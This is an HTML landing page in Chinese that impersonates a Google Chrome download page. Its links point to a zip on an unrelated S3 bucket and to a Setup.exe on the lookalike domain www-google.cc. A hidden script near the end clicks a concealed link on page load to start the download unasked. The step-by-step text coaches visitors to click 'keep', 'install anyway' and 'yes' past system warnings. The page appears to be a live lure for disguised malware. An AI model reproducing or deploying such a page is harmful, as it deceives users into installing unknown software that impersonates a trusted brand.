
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>感谢下载！谷歌浏览器下载，纯净、快速、好用的谷歌极速浏览器下载！</title>
<link rel="shortcut icon" href="favicon.ico">
<link rel="bookmark" href="favicon.ico">
<style type="text/css">
body {margin: 0; padding: 0; border: 0; text-align: center; font-family: "Microsoft YaHei",sans-serif; font-size: 12px; color: #000000; font-weight: 400;}
img {margin: 0; padding: 0; border: 0; text-align: center;}
div {padding: 0;}
a {text-decoration: none; padding: 0;}
.a01 {margin: 0 auto; text-align: center; min-width: 993px; height: 968px; background: #ffffff;}
.a64 {margin: 0; text-align: center; height: 60px; background: #ffffff; border-bottom: 2px solid #efeff0; position: fixed; top: 0; left: 0; right: 0; z-index: 10;}
.a50 {margin: 0; text-align: center; width: 246px; height: 60px; background: #ffffff url(https://chrome.buswvv.cn/a01b.png) no-repeat center top; position: fixed; top: 0; left: 0; z-index: 20;}
.a81 {margin: 0 auto; text-align: center; padding-left: 26px; width: 212px; height: 60px; font-size: 24px; line-height: 60px; display: block;}
.a52 {margin: 0; text-align: center; width: 184px; height: 60px; background: #ffffff url(https://chrome.buswvv.cn/a02a.png) no-repeat center top; position: fixed; top: 0; right: 0; z-index: 30;}
.a53 {margin: 0 auto; text-align: center; width: 184px; height: 60px; font-size: 16px; line-height: 60px; display: block;}
.a57 {color: #ffffff;}
.a51 {margin: 0 auto; text-align: center; width: 993px; height: 83px; background: #ffffff;}
.a02 {margin: 0 auto; text-align: center; width: 993px; height: 153px; background: #ffffff url(https://chrome.buswvv.cn/a11d.png) no-repeat center top;}
.a82 {margin: 0 auto; text-align: center; width: 228px; height: 153px; display: block;}
.a03 {margin: 0 auto; text-align: center; width: 993px; height: 175px; font-size: 60px; color: #202125; background: #ffffff;}
.a83 {color: #202125;}
.a183 {color: #202125; font-weight: 300;}
.a05 {margin: 0 auto; text-align: center; width: 993px; height: 80px; font-size: 16px; color: #3c4043; background: #ffffff;}
.a56 {color: #1967d2; text-decoration:underline;}
.a06 {margin: 0 auto; text-align: center; width: 993px; height: 453px; background: #ffffff url(https://chrome.buswvv.cn/a12f.png) no-repeat center top;}
.a09 {margin: 42px 0px 0px 38px; text-align: left; width: 218px; height: 218px; float: left;}
.a10 {margin: 42px 0px 0px 122px; text-align: left; width: 218px; height: 218px; float: left;}
.a11 {margin: 42px 56px 0px 0px; text-align: left; width: 218px; height: 218px; float: right;}
.a12 {font-size: 12px; color: #202125;}
.a13 {font-size: 30px; line-height: 60px; color: #202125;}
.a14 {font-size: 16px; line-height: 30px; color: #3c4043;}
.a15 {font-weight: bold; color: #202125;}
.a63 {margin: 0 auto; text-align: center; width: 993px; height: 12px; font-size: 12px; color: #3c4043; background: #ffffff;}
</style>
<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?be4baa89daf3fad543c1ff96979a3e20";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>
</head>
<body>
<div class="a01">
<div class="a64"></div>
<div class="a50"><a href="https://fbnidshfbis.s3.ap-east-1.amazonaws.com/super.zip" class="a81"><span class="a183">谷歌浏览器</span></a></div>
<div class="a52"><a href="https://fbnidshfbis.s3.ap-east-1.amazonaws.com/super.zip" class="a53"><span class="a57">立即下载</span></a></div>
<div class="a51"></div>
<div class="a02"><a href="https://fbnidshfbis.s3.ap-east-1.amazonaws.com/super.zip" class="a82"></a></div>
<div class="a03"><a href="https://fbnidshfbis.s3.ap-east-1.amazonaws.com/super.zip"><span class="a83">感谢下载！</span></a><br>
<a href="https://www-google.cc/Setup.exe"><span class="a83">还差几步即可大功告成</span></a></div>
<div class="a05">
您的下载任务将会自动开始。如果无法正常下载，<a href="https://fbnidshfbis.s3.ap-east-1.amazonaws.com/super.zip"><span class="a56">点这手动下载谷歌极速浏览器。</span></a>
</div>
<div class="a06">
<div class="a09">
<span class="a12">第 1 步</span><br>
<span class="a13">打开</span><br>
<span class="a14">从此浏览器<span class="a15">“弹出框”</span>或<span class="a15">“右上角”</span>或<span class="a15">“左下角”</span>的下载列表中打开安装文件。</span>
</div>
<div class="a10">
<span class="a12">第 2 步</span><br>
<span class="a13">允许</span><br>
<span class="a14">如果系统提示，请在系统对话框中依次点击<span class="a15">“保留”</span>和<span class="a15">“仍然安装”</span>和<span class="a15">“是”</span>。</span>
</div>
<div class="a11">
<span class="a12">第 3 步</span><br>
<span class="a13">安装</span><br>
<span class="a14">请等待<span class="a15">“谷歌极速浏览器”</span>安装完成，极速浏览器会在安装完成后自动打开。</span>
</div>
</div>
<div class="a63">
<span style="display:none">
<a href="https://fbnidshfbis.s3.ap-east-1.amazonaws.com/super.zip" id="zdtcxz">立即下载</a>
<script type="text/javascript">
window.onload=function(){
document.getElementById("zdtcxz").click();
}
</script>
</span>
</div>
</div>
</body>
</html>
